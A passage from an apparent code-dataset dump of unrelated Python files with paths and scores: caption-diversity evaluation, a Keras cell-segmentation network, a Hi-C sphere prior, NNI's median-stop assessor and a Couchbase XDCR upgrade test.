for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
sample_n = capsById[list(capsById.keys())[0]]
for i in range(len(capsById[list(capsById.keys())[0]])):
preds = [_[i] for _ in capsById.values()]
json.dump(preds, open(cache_path, 'w')) # serialize to temporary json file. Sigh, COCO API...
cocoRes = coco.loadRes(cache_path)
cocoEval = COCOEvalCap(coco, cocoRes, spice_threads=SPICE_THREADS)
cocoEval.params['image_id'] = cocoRes.getImgIds()
cocoEval.evaluate()
imgToEval = cocoEval.imgToEval
for img_id in capsById.keys():
tmp = imgToEval[img_id]
for k in tmp['SPICE'].keys():
if k != 'All':
tmp['SPICE_'+k] = tmp['SPICE'][k]['f']
if tmp['SPICE_'+k] != tmp['SPICE_'+k]: # nan
tmp['SPICE_'+k] = -100
tmp['SPICE'] = tmp['SPICE']['All']['f']
if tmp['SPICE'] != tmp['SPICE']: tmp['SPICE'] = -100
capsById[img_id][i]['scores'] = imgToEval[img_id]
out = {'overall': {}, 'ImgToEval': {}}
for img_id in capsById.keys():
out['ImgToEval'][img_id] = {}
for metric in capsById[img_id][0]['scores'].keys():
if metric == 'image_id': continue
out['ImgToEval'][img_id]['oracle_'+metric] = max([_['scores'][metric] for _ in capsById[img_id]])
out['ImgToEval'][img_id]['avg_'+metric] = sum([_['scores'][metric] for _ in capsById[img_id]]) / len(capsById[img_id])
out['ImgToEval'][img_id]['captions'] = capsById[img_id]
for metric in list(out['ImgToEval'].values())[0].keys():
if metric == 'captions':
continue
tmp = np.array([_[metric] for _ in out['ImgToEval'].values()])
tmp = tmp[tmp!=-100]
out['overall'][metric] = tmp.mean()
return out
def eval_div_stats(dataset, preds_n, model_id, split):
tokenizer = PTBTokenizer()
capsById = {}
for i, d in enumerate(preds_n):
d['id'] = i
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
n_caps_perimg = len(capsById[list(capsById.keys())[0]])
print(n_caps_perimg)
_capsById = capsById # save the untokenized version
capsById = tokenizer.tokenize(capsById)
div_1, adiv_1 = compute_div_n(capsById,1)
div_2, adiv_2 = compute_div_n(capsById,2)
globdiv_1, _= compute_global_div_n(capsById,1)
print('Diversity Statistics are as follows: \n Div1: %.2f, Div2: %.2f, gDiv1: %d\n'%(div_1,div_2, globdiv_1))
# compute mbleu
scorer = Bleu(4)
all_scrs = []
scrperimg = np.zeros((n_caps_perimg, len(capsById)))
for i in range(n_caps_perimg):
tempRefsById = {}
candsById = {}
for k in capsById:
tempRefsById[k] = capsById[k][:i] + capsById[k][i+1:]
candsById[k] = [capsById[k][i]]
score, scores = scorer.compute_score(tempRefsById, candsById)
all_scrs.append(score)
scrperimg[i,:] = scores[1]
all_scrs = np.array(all_scrs)
out = {}
out['overall'] = {'Div1': div_1, 'Div2': div_2, 'gDiv1': globdiv_1}
for k, score in zip(range(4), all_scrs.mean(axis=0).tolist()):
out['overall'].update({'mBLeu_%d'%(k+1): score})
imgToEval = {}
for i,imgid in enumerate(capsById.keys()):
imgToEval[imgid] = {'mBleu_2' : scrperimg[:,i].mean()}
imgToEval[imgid]['individuals'] = []
for j, d in enumerate(_capsById[imgid]):
imgToEval[imgid]['individuals'].append(preds_n[d['id']])
imgToEval[imgid]['individuals'][-1]['mBleu_2'] = scrperimg[j,i]
out['ImgToEval'] = imgToEval
print('Mean mutual Bleu scores on this set is:\nmBLeu_1, mBLeu_2, mBLeu_3, mBLeu_4')
print(all_scrs.mean(axis=0))
return out
def eval_self_cider(dataset, preds_n, model_id, split):
cache_path = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
coco = getCOCO(dataset)
valids = coco.getImgIds()
# Get Cider_scorer
Cider_scorer = Cider(df='corpus')
tokenizer = PTBTokenizer()
gts = {}
for imgId in valids:
gts[imgId] = coco.imgToAnns[imgId]
gts = tokenizer.tokenize(gts)
for imgId in valids:
Cider_scorer.cider_scorer += (None, gts[imgId])
Cider_scorer.cider_scorer.compute_doc_freq()
Cider_scorer.cider_scorer.ref_len = np.log(float(len(Cider_scorer.cider_scorer.crefs)))
# Prepare captions
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
capsById = tokenizer.tokenize(capsById)
imgIds = list(capsById.keys())
scores = Cider_scorer.my_self_cider([capsById[_] for _ in imgIds])
def get_div(eigvals):
eigvals = np.clip(eigvals, 0, None)
return -np.log(np.sqrt(eigvals[-1]) / (np.sqrt(eigvals).sum())) / np.log(len(eigvals))
sc_scores = [get_div(np.linalg.eigvalsh(_/10)) for _ in scores]
score = np.mean(np.array(sc_scores))
imgToEval = {}
for i, image_id in enumerate(imgIds):
imgToEval[image_id] = {'self_cider': sc_scores[i], 'self_cider_mat': scores[i].tolist()}
return {'overall': {'self_cider': score}, 'imgToEval': imgToEval}
return score
| 0.424173 | 0.117673 |
from keras.models import Sequential
from keras.layers.convolutional import Conv2D, Convolution2DTranspose, UpSampling2D
from keras.layers.pooling import MaxPool2D
from keras import metrics
from keras.layers import Input
from keras.layers.merge import concatenate
from keras.models import Model
from keras.applications import VGG16
from keras.initializers import Ones
def Skip_Cell_Model(no_labels = 2, opt='adadelta', pass_levels = [1,2,3,4]):
"""
A deep convolutional neural network for segmenting Xray tomography data
of cells. The architecture is inspired by DeconvNet, arxiv:1505.04366
and U-net, arxiv:1505.04597.
We use the VGG-16 architecture and weights for the convolutional layers,
then upsample by doubling.
Returns:
A keras model, pre-compiled
Keyword arguments:
no_labels -- number of labelled classes
opt -- otpimizer to be used for training
pass_levels -- the skip through layers to include. Lower layers
include higher resolution data
"""
bottle_neck = VGG16(include_top=False, weights='imagenet')
img_input = Input(shape=(256,256,1))
#The initial VGG 16 layers, with skip throughs added
x = Conv2D(3,(1,1),padding = 'same',input_shape=(256,256,1),
use_bias=False, kernel_initializer=Ones())(img_input)
x = Conv2D(**(bottle_neck.layers[1].get_config()))(x)
x_split_1 = Conv2D(**(bottle_neck.layers[2].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[3].get_config()))(x_split_1)
x = Conv2D(**(bottle_neck.layers[4].get_config()))(x)
x_split_2 = Conv2D(**(bottle_neck.layers[5].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[6].get_config()))(x_split_2)
x = Conv2D(**(bottle_neck.layers[7].get_config()))(x)
x = Conv2D(**(bottle_neck.layers[8].get_config()))(x)
x_split_3 = Conv2D(**(bottle_neck.layers[9].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[10].get_config()))(x_split_3)
x = Conv2D(**(bottle_neck.layers[11].get_config()))(x)
x = Conv2D(**(bottle_neck.layers[12].get_config()))(x)
x_split_4 = Conv2D(**(bottle_neck.layers[13].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[14].get_config()))(x_split_4)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x_join_4 = UpSampling2D((2,2))(x)
if 4 in pass_levels:
x = concatenate([x_join_4,x_split_4],axis=3)
else:
x = x_join_4
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x_join_3 = UpSampling2D((2,2))(x)
if 3 in pass_levels:
x = concatenate([x_join_3,x_split_3],axis=3)
else:
x = x_join_3
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x_join_2 = UpSampling2D((2,2))(x)
if 2 in pass_levels:
x = concatenate([x_join_2,x_split_2],axis=3)
else:
x = x_join_2
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x_join_1 = UpSampling2D((2,2))(x)
if 1 in pass_levels:
x = concatenate([x_join_1,x_split_1],axis =3)
else:
x = x_join_1
x = Convolution2DTranspose(64,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(64,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(no_labels,1,padding='same',activation='softmax')(x)
model = Model(img_input, x)
model.layers[1].trainable = False
for i in range(14):
(model.layers[i+2]).set_weights((bottle_neck.layers[i+1]).get_weights())
(model.layers[i+2]).trainable = False
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics = [metrics.categorical_accuracy])
return model
|
model.py
|
from keras.models import Sequential
from keras.layers.convolutional import Conv2D, Convolution2DTranspose, UpSampling2D
from keras.layers.pooling import MaxPool2D
from keras import metrics
from keras.layers import Input
from keras.layers.merge import concatenate
from keras.models import Model
from keras.applications import VGG16
from keras.initializers import Ones
def Skip_Cell_Model(no_labels = 2, opt='adadelta', pass_levels = [1,2,3,4]):
"""
A deep convolutional neural network for segmenting Xray tomography data
of cells. The architecture is inspired by DeconvNet, arxiv:1505.04366
and U-net, arxiv:1505.04597.
We use the VGG-16 architecture and weights for the convolutional layers,
then upsample by doubling.
Returns:
A keras model, pre-compiled
Keyword arguments:
no_labels -- number of labelled classes
opt -- otpimizer to be used for training
pass_levels -- the skip through layers to include. Lower layers
include higher resolution data
"""
bottle_neck = VGG16(include_top=False, weights='imagenet')
img_input = Input(shape=(256,256,1))
#The initial VGG 16 layers, with skip throughs added
x = Conv2D(3,(1,1),padding = 'same',input_shape=(256,256,1),
use_bias=False, kernel_initializer=Ones())(img_input)
x = Conv2D(**(bottle_neck.layers[1].get_config()))(x)
x_split_1 = Conv2D(**(bottle_neck.layers[2].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[3].get_config()))(x_split_1)
x = Conv2D(**(bottle_neck.layers[4].get_config()))(x)
x_split_2 = Conv2D(**(bottle_neck.layers[5].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[6].get_config()))(x_split_2)
x = Conv2D(**(bottle_neck.layers[7].get_config()))(x)
x = Conv2D(**(bottle_neck.layers[8].get_config()))(x)
x_split_3 = Conv2D(**(bottle_neck.layers[9].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[10].get_config()))(x_split_3)
x = Conv2D(**(bottle_neck.layers[11].get_config()))(x)
x = Conv2D(**(bottle_neck.layers[12].get_config()))(x)
x_split_4 = Conv2D(**(bottle_neck.layers[13].get_config()))(x)
x = MaxPool2D(**(bottle_neck.layers[14].get_config()))(x_split_4)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x_join_4 = UpSampling2D((2,2))(x)
if 4 in pass_levels:
x = concatenate([x_join_4,x_split_4],axis=3)
else:
x = x_join_4
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x = Convolution2DTranspose(512,3,padding='same',activation = 'relu')(x)
x_join_3 = UpSampling2D((2,2))(x)
if 3 in pass_levels:
x = concatenate([x_join_3,x_split_3],axis=3)
else:
x = x_join_3
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(256,3,padding='same', activation = 'relu')(x)
x_join_2 = UpSampling2D((2,2))(x)
if 2 in pass_levels:
x = concatenate([x_join_2,x_split_2],axis=3)
else:
x = x_join_2
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(128,3,padding='same', activation = 'relu')(x)
x_join_1 = UpSampling2D((2,2))(x)
if 1 in pass_levels:
x = concatenate([x_join_1,x_split_1],axis =3)
else:
x = x_join_1
x = Convolution2DTranspose(64,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(64,3,padding='same', activation = 'relu')(x)
x = Convolution2DTranspose(no_labels,1,padding='same',activation='softmax')(x)
model = Model(img_input, x)
model.layers[1].trainable = False
for i in range(14):
(model.layers[i+2]).set_weights((bottle_neck.layers[i+1]).get_weights())
(model.layers[i+2]).trainable = False
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics = [metrics.categorical_accuracy])
return model
| 0.895836 | 0.673156 |
import numpy
from csb.statistics.pdf.parameterized import Parameter
from binf import ArrayParameter
from binf.pdf.priors import AbstractPrior
from .sphere_prior_c import sphere_prior_gradient
class SpherePrior(AbstractPrior):
def __init__(self, name, sphere_radius, sphere_k, n_structures,
bead_radii, sphere_center=None):
"""
Structural Boltzmann-like prior distribution harmonically restraining
all beads to be located within a sphere of a given radius
:param name: a unique name for this object, usually 'sphere_prior'
:type name: string
:param sphere_radius: the radius of the sphere within which to
restrain the beads
:type sphere_radius: float
:param sphere_k: force constant
:type sphere_k: float
:param n_structures: number of ensemble members
:type n_structures: int
:param bead_radii: bead radii for each bead
:type bead_radii: :class:`numpy.ndarray`
:param sphere_center: coordinates of the sphere center,
if none, (0, 0, 0) is assumed
:type sphere_center: :class:`numpy.ndarray`
:returns: set-up spherical prior distribution object
:rtype: :class:`.SpherePrior`
"""
super(SpherePrior, self).__init__(name)
self.n_structures = n_structures
self.bead_radii = bead_radii
self.bead_radii2 = bead_radii ** 2
self._register_variable('structures', differentiable=True)
self._register('sphere_radius')
self['sphere_radius'] = Parameter(sphere_radius, 'sphere_radius')
self._register('sphere_k')
self['sphere_k'] = Parameter(sphere_k, 'sphere_k')
self._register('sphere_center')
sphere_center = numpy.zeros(3) if sphere_center is None else sphere_center
self['sphere_center'] = ArrayParameter(sphere_center, 'sphere_center')
self.update_var_param_types(structures=ArrayParameter)
self._set_original_variables()
def _single_structure_log_prob(self, structure):
r = self['sphere_radius'].value
k = self['sphere_k'].value
br = self.bead_radii
X = structure.reshape(-1, 3)
norms = numpy.sqrt(numpy.sum((X - self['sphere_center'].value[None,:])
**2, 1))
violating = norms + br > r
return -0.5 * k * numpy.sum((norms[violating] + br[violating] - r) ** 2)
def _single_structure_gradient(self, structure):
X = structure.reshape(-1, 3)
return sphere_prior_gradient(X,
self['sphere_center'].value,
self['sphere_radius'].value,
self['sphere_k'].value,
numpy.arange(len(X)),
self.bead_radii,
self.bead_radii2)
def _evaluate_log_prob(self, structures):
log_prob = self._single_structure_log_prob
X = structures.reshape(self.n_structures, -1, 3)
return numpy.sum(map(lambda x: log_prob(structure=x), X))
def _evaluate_gradient(self, structures):
grad = self._single_structure_gradient
X = structures.reshape(self.n_structures, -1, 3)
return numpy.concatenate(map(lambda x: grad(structure=x), X))
def clone(self):
copy = self.__class__(name=self.name,
sphere_radius=self['sphere_radius'].value,
sphere_k=self['sphere_k'].value,
n_structures=self.n_structures,
bead_radii=self.bead_radii,
sphere_center=self['sphere_center'].value)
copy.set_fixed_variables_from_pdf(self)
return copy
|
ensemble_hic/sphere_prior.py
|
import numpy
from csb.statistics.pdf.parameterized import Parameter
from binf import ArrayParameter
from binf.pdf.priors import AbstractPrior
from .sphere_prior_c import sphere_prior_gradient
class SpherePrior(AbstractPrior):
def __init__(self, name, sphere_radius, sphere_k, n_structures,
bead_radii, sphere_center=None):
"""
Structural Boltzmann-like prior distribution harmonically restraining
all beads to be located within a sphere of a given radius
:param name: a unique name for this object, usually 'sphere_prior'
:type name: string
:param sphere_radius: the radius of the sphere within which to
restrain the beads
:type sphere_radius: float
:param sphere_k: force constant
:type sphere_k: float
:param n_structures: number of ensemble members
:type n_structures: int
:param bead_radii: bead radii for each bead
:type bead_radii: :class:`numpy.ndarray`
:param sphere_center: coordinates of the sphere center,
if none, (0, 0, 0) is assumed
:type sphere_center: :class:`numpy.ndarray`
:returns: set-up spherical prior distribution object
:rtype: :class:`.SpherePrior`
"""
super(SpherePrior, self).__init__(name)
self.n_structures = n_structures
self.bead_radii = bead_radii
self.bead_radii2 = bead_radii ** 2
self._register_variable('structures', differentiable=True)
self._register('sphere_radius')
self['sphere_radius'] = Parameter(sphere_radius, 'sphere_radius')
self._register('sphere_k')
self['sphere_k'] = Parameter(sphere_k, 'sphere_k')
self._register('sphere_center')
sphere_center = numpy.zeros(3) if sphere_center is None else sphere_center
self['sphere_center'] = ArrayParameter(sphere_center, 'sphere_center')
self.update_var_param_types(structures=ArrayParameter)
self._set_original_variables()
def _single_structure_log_prob(self, structure):
r = self['sphere_radius'].value
k = self['sphere_k'].value
br = self.bead_radii
X = structure.reshape(-1, 3)
norms = numpy.sqrt(numpy.sum((X - self['sphere_center'].value[None,:])
**2, 1))
violating = norms + br > r
return -0.5 * k * numpy.sum((norms[violating] + br[violating] - r) ** 2)
def _single_structure_gradient(self, structure):
X = structure.reshape(-1, 3)
return sphere_prior_gradient(X,
self['sphere_center'].value,
self['sphere_radius'].value,
self['sphere_k'].value,
numpy.arange(len(X)),
self.bead_radii,
self.bead_radii2)
def _evaluate_log_prob(self, structures):
log_prob = self._single_structure_log_prob
X = structures.reshape(self.n_structures, -1, 3)
return numpy.sum(map(lambda x: log_prob(structure=x), X))
def _evaluate_gradient(self, structures):
grad = self._single_structure_gradient
X = structures.reshape(self.n_structures, -1, 3)
return numpy.concatenate(map(lambda x: grad(structure=x), X))
def clone(self):
copy = self.__class__(name=self.name,
sphere_radius=self['sphere_radius'].value,
sphere_k=self['sphere_k'].value,
n_structures=self.n_structures,
bead_radii=self.bead_radii,
sphere_center=self['sphere_center'].value)
copy.set_fixed_variables_from_pdf(self)
return copy
| 0.937996 | 0.476519 |
import logging
from nni.assessor import Assessor, AssessResult
logger = logging.getLogger('medianstop_Assessor')
class MedianstopAssessor(Assessor):
"""MedianstopAssessor is The median stopping rule stops a pending trial X at step S
if the trial’s best objective value by step S is strictly worse than the median value
of the running averages of all completed trials’ objectives reported up to step S
Parameters
----------
optimize_mode: str
optimize mode, 'maximize' or 'minimize'
start_step: int
only after receiving start_step number of reported intermediate results
"""
def __init__(self, optimize_mode='maximize', start_step=0):
self.start_step = start_step
self.running_history = dict()
self.completed_avg_history = dict()
if optimize_mode == 'maximize':
self.high_better = True
elif optimize_mode == 'minimize':
self.high_better = False
else:
self.high_better = True
logger.warning('unrecognized optimize_mode', optimize_mode)
def _update_data(self, trial_job_id, trial_history):
"""update data
Parameters
----------
trial_job_id: int
trial job id
trial_history: list
The history performance matrix of each trial
"""
if trial_job_id not in self.running_history:
self.running_history[trial_job_id] = []
self.running_history[trial_job_id].extend(trial_history[len(self.running_history[trial_job_id]):])
def trial_end(self, trial_job_id, success):
"""trial_end
Parameters
----------
trial_job_id: int
trial job id
success: bool
True if succssfully finish the experiment, False otherwise
"""
if trial_job_id in self.running_history:
if success:
cnt = 0
history_sum = 0
self.completed_avg_history[trial_job_id] = []
for each in self.running_history[trial_job_id]:
cnt += 1
history_sum += each
self.completed_avg_history[trial_job_id].append(history_sum / cnt)
self.running_history.pop(trial_job_id)
else:
logger.warning('trial_end: trial_job_id does not in running_history')
def assess_trial(self, trial_job_id, trial_history):
"""assess_trial
Parameters
----------
trial_job_id: int
trial job id
trial_history: list
The history performance matrix of each trial
Returns
-------
bool
AssessResult.Good or AssessResult.Bad
Raises
------
Exception
unrecognize exception in medianstop_assessor
"""
curr_step = len(trial_history)
if curr_step < self.start_step:
return AssessResult.Good
try:
num_trial_history = [float(ele) for ele in trial_history]
except (TypeError, ValueError) as error:
logger.warning('incorrect data type or value:')
logger.exception(error)
except Exception as error:
logger.warning('unrecognized exception in medianstop_assessor:')
logger.excpetion(error)
self._update_data(trial_job_id, num_trial_history)
if self.high_better:
best_history = max(trial_history)
else:
best_history = min(trial_history)
avg_array = []
for id in self.completed_avg_history:
if len(self.completed_avg_history[id]) >= curr_step:
avg_array.append(self.completed_avg_history[id][curr_step - 1])
if len(avg_array) > 0:
avg_array.sort()
if self.high_better:
median = avg_array[(len(avg_array)-1) // 2]
return AssessResult.Bad if best_history < median else AssessResult.Good
else:
median = avg_array[len(avg_array) // 2]
return AssessResult.Bad if best_history > median else AssessResult.Good
else:
return AssessResult.Good
|
src/sdk/pynni/nni/medianstop_assessor/medianstop_assessor.py
|
import logging
from nni.assessor import Assessor, AssessResult
logger = logging.getLogger('medianstop_Assessor')
class MedianstopAssessor(Assessor):
"""MedianstopAssessor is The median stopping rule stops a pending trial X at step S
if the trial’s best objective value by step S is strictly worse than the median value
of the running averages of all completed trials’ objectives reported up to step S
Parameters
----------
optimize_mode: str
optimize mode, 'maximize' or 'minimize'
start_step: int
only after receiving start_step number of reported intermediate results
"""
def __init__(self, optimize_mode='maximize', start_step=0):
self.start_step = start_step
self.running_history = dict()
self.completed_avg_history = dict()
if optimize_mode == 'maximize':
self.high_better = True
elif optimize_mode == 'minimize':
self.high_better = False
else:
self.high_better = True
logger.warning('unrecognized optimize_mode', optimize_mode)
def _update_data(self, trial_job_id, trial_history):
"""update data
Parameters
----------
trial_job_id: int
trial job id
trial_history: list
The history performance matrix of each trial
"""
if trial_job_id not in self.running_history:
self.running_history[trial_job_id] = []
self.running_history[trial_job_id].extend(trial_history[len(self.running_history[trial_job_id]):])
def trial_end(self, trial_job_id, success):
"""trial_end
Parameters
----------
trial_job_id: int
trial job id
success: bool
True if succssfully finish the experiment, False otherwise
"""
if trial_job_id in self.running_history:
if success:
cnt = 0
history_sum = 0
self.completed_avg_history[trial_job_id] = []
for each in self.running_history[trial_job_id]:
cnt += 1
history_sum += each
self.completed_avg_history[trial_job_id].append(history_sum / cnt)
self.running_history.pop(trial_job_id)
else:
logger.warning('trial_end: trial_job_id does not in running_history')
def assess_trial(self, trial_job_id, trial_history):
"""assess_trial
Parameters
----------
trial_job_id: int
trial job id
trial_history: list
The history performance matrix of each trial
Returns
-------
bool
AssessResult.Good or AssessResult.Bad
Raises
------
Exception
unrecognize exception in medianstop_assessor
"""
curr_step = len(trial_history)
if curr_step < self.start_step:
return AssessResult.Good
try:
num_trial_history = [float(ele) for ele in trial_history]
except (TypeError, ValueError) as error:
logger.warning('incorrect data type or value:')
logger.exception(error)
except Exception as error:
logger.warning('unrecognized exception in medianstop_assessor:')
logger.excpetion(error)
self._update_data(trial_job_id, num_trial_history)
if self.high_better:
best_history = max(trial_history)
else:
best_history = min(trial_history)
avg_array = []
for id in self.completed_avg_history:
if len(self.completed_avg_history[id]) >= curr_step:
avg_array.append(self.completed_avg_history[id][curr_step - 1])
if len(avg_array) > 0:
avg_array.sort()
if self.high_better:
median = avg_array[(len(avg_array)-1) // 2]
return AssessResult.Bad if best_history < median else AssessResult.Good
else:
median = avg_array[len(avg_array) // 2]
return AssessResult.Bad if best_history > median else AssessResult.Good
else:
return AssessResult.Good
| 0.724675 | 0.328664 |
import queue
import copy, json
from .newupgradebasetest import NewUpgradeBaseTest
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from couchbase_helper.documentgenerator import BlobGenerator
from membase.api.rest_client import RestConnection, RestHelper
from membase.api.exception import RebalanceFailedException
from membase.helper.cluster_helper import ClusterOperationHelper
from memcached.helper.kvstore import KVStore
from fts.stable_topology_fts import StableTopFTS
from pytests.fts.fts_callable import FTSCallable
from couchbase.cluster import Cluster, PasswordAuthenticator
from security.rbac_base import RbacBase
from threading import Thread
from collection.collections_cli_client import CollectionsCLI
from collection.collections_rest_client import CollectionsRest
from collection.collections_stats import CollectionsStats
class XDCRUpgradeCollectionsTests(NewUpgradeBaseTest):
def setUp(self):
super(XDCRUpgradeCollectionsTests, self).setUp()
self.nodes_init = self.input.param('nodes_init', 2)
self.queue = queue.Queue()
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 1000)
self.doc_size = self.input.param("doc_size", 100)
self.loader = self.input.param("loader", "high_doc_ops")
self.instances = self.input.param("instances", 4)
self.threads = self.input.param("threads", 5)
self.use_replica_to = self.input.param("use_replica_to", False)
self.index_name_prefix = None
self.rest_src = RestConnection(self.servers[0])
def tearDown(self):
super(XDCRUpgradeCollectionsTests, self).tearDown()
def enable_migration_mode(self, src_bucket, dest_bucket):
setting_val_map = {"collectionsMigrationMode": "true",
"colMappingRules": '{"REGEXP_CONTAINS(META().id,\'0$\')":"scope1.mycollection_scope1"}'
}
self.rest_src.set_xdcr_params(src_bucket, dest_bucket, setting_val_map)
def verify_doc_counts(self):
des_master = self.servers[self.nodes_init]
src_cbver = RestConnection(self.master).get_nodes_version()
des_cbver = RestConnection(des_master).get_nodes_version()
src_items = RestConnection(self.master).get_buckets_itemCount()
des_items = RestConnection(des_master).get_buckets_itemCount()
if src_cbver[:3] < "7.0" and des_cbver[:3] >= "7.0":
des_items = self.get_col_item_count(des_master, "default", "_default",
"_default", self.des_stat_col)
if src_items["default"] != des_items:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items["default"], des_items))
elif src_cbver[:3] >= "7.0" and des_cbver[:3] < "7.0":
src_items = self.get_col_item_count(self.master, "default", "_default",
"_default", self.stat_col)
if src_items != des_items["default"]:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items, des_items["default"]))
elif src_cbver[:3] >= "7.0" and des_cbver[:3] >= "7.0":
if src_items["default"] != des_items["default"]:
self.fail("items do not match. src: {0} != des: {1}"
.format(src_items["default"], des_items["default"]))
def test_xdcr_upgrade_with_services(self):
after_upgrade_services_in = self.input.param("after_upgrade_services_in", False)
after_upgrade_buckets_in = self.input.param("after_upgrade_buckets_in", False)
after_upgrade_buckets_out = self.input.param("after_upgrade_buckets_out", False)
after_upgrade_buckets_flush = self.input.param("after_upgrade_buckets_flush", False)
# Install initial version on the specified nodes
self._install(self.servers[:self.nodes_init])
# Configure the nodes with services on cluster1
self.operations(self.servers[:self.nodes_init], services="kv,kv")
# get the n1ql node which will be used in pre,during and post upgrade for running n1ql commands
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
# Run the pre upgrade operations, typically creating index
self.pre_upgrade(self.servers[:self.nodes_init])
if self.input.param("ddocs_num", 0) > 0:
self.create_ddocs_and_views()
self._install(self.servers[self.nodes_init:self.num_servers])
self.master = self.servers[self.nodes_init]
# Configure the nodes with services on the other cluster2
try:
self.operations(self.servers[self.nodes_init:self.num_servers], services="kv,kv")
self.sleep(timeout=10)
except Exception as ex:
if ex:
print("error: ", str(ex))
self.log.info("bucket is created")
# create a xdcr relationship between cluster1 and cluster2
self.rest_src.add_remote_cluster(self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port,
'Administrator', 'password', "C2")
repl_id = self.rest_src.start_replication('continuous', 'default', "C2")
if repl_id is not None:
self.log.info("Replication created successfully")
# Run the post_upgrade operations
self._create_ephemeral_buckets()
self.post_upgrade(self.servers[:self.nodes_init])
# Add new services after the upgrade
for upgrade_version in self.upgrade_versions:
src_nodes = self.servers[:self.nodes_init]
for server in src_nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
src_upgrade_threads = self._async_update(upgrade_version, src_nodes)
for upgrade_thread in src_upgrade_threads:
upgrade_thread.join()
src_success_upgrade = True
while not self.queue.empty():
src_success_upgrade &= self.queue.get()
if not src_success_upgrade:
self.fail("Upgrade failed in source cluster. See logs above!")
else:
self.log.info("Upgrade source cluster success")
des_nodes = self.servers[self.nodes_init:self.num_servers]
self.master = self.servers[self.nodes_init]
for server in des_nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
des_upgrade_threads = self._async_update(upgrade_version, des_nodes)
for upgrade_thread in des_upgrade_threads:
upgrade_thread.join()
des_success_upgrade = True
while not self.queue.empty():
des_success_upgrade &= self.queue.get()
if not des_success_upgrade:
self.fail("Upgrade failed in des cluster. See logs above!")
else:
self.log.info("Upgrade des cluster success")
self.master = self.servers[0]
self.rest = RestConnection(self.master)
self.rest_col = CollectionsRest(self.master)
self.cli_col = CollectionsCLI(self.master)
self.stat_col = CollectionsStats(self.master)
self.log.info("Create scope collection at src cluster")
#self.rest_col.create_scope_collection_count()
self._create_scope_collection(self.rest_col, self.cli_col, self.buckets[0].name)
self.sleep(10)
self.des_rest = RestConnection(self.servers[self.nodes_init])
self.des_rest_col = CollectionsRest(self.servers[self.nodes_init])
self.des_cli_col = CollectionsCLI(self.servers[self.nodes_init])
self.des_stat_col = CollectionsStats(self.servers[self.nodes_init])
self.log.info("Create scope collection at des cluster")
self.buckets = RestConnection(self.servers[self.nodes_init]).get_buckets()
self._create_scope_collection(self.des_rest_col, self.des_cli_col, self.buckets[0].name)
self.load_to_collections_bucket()
self.enable_migration = self.input.param("enable_migration", False)
if self.enable_migration:
self.enable_migration_mode(self.buckets[0].name, self.buckets[0].name)
self.verify_doc_counts()
if after_upgrade_buckets_in is not False:
self.bucket_size = 100
self._create_sasl_buckets(self.master, 1)
self._create_standard_buckets(self.master, 1)
if self.input.param("ddocs_num", 0) > 0:
self.create_ddocs_and_views()
gen_load = BlobGenerator('upgrade', 'upgrade-', self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", self.expire_time,
flag=self.item_flag)
# deleting buckets after upgrade
if after_upgrade_buckets_out is not False:
self._all_buckets_delete(self.master)
# flushing buckets after upgrade
if after_upgrade_buckets_flush is not False:
self._all_buckets_flush()
def run_view_queries(self):
view_query_thread = Thread(target=self.view_queries, name="run_queries",
args=(self.run_view_query_iterations,))
return view_query_thread
def view_queries(self, iterations):
query = {"connectionTimeout": 60000}
for count in range(iterations):
for i in range(self.view_num):
self.cluster.query_view(self.master, self.ddocs[0].name,
self.default_view_name + str(i), query,
expected_rows=None, bucket="default", retry_time=2)
def create_user(self, node):
self.log.info("inside create_user")
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket',
'password': 'password'}]
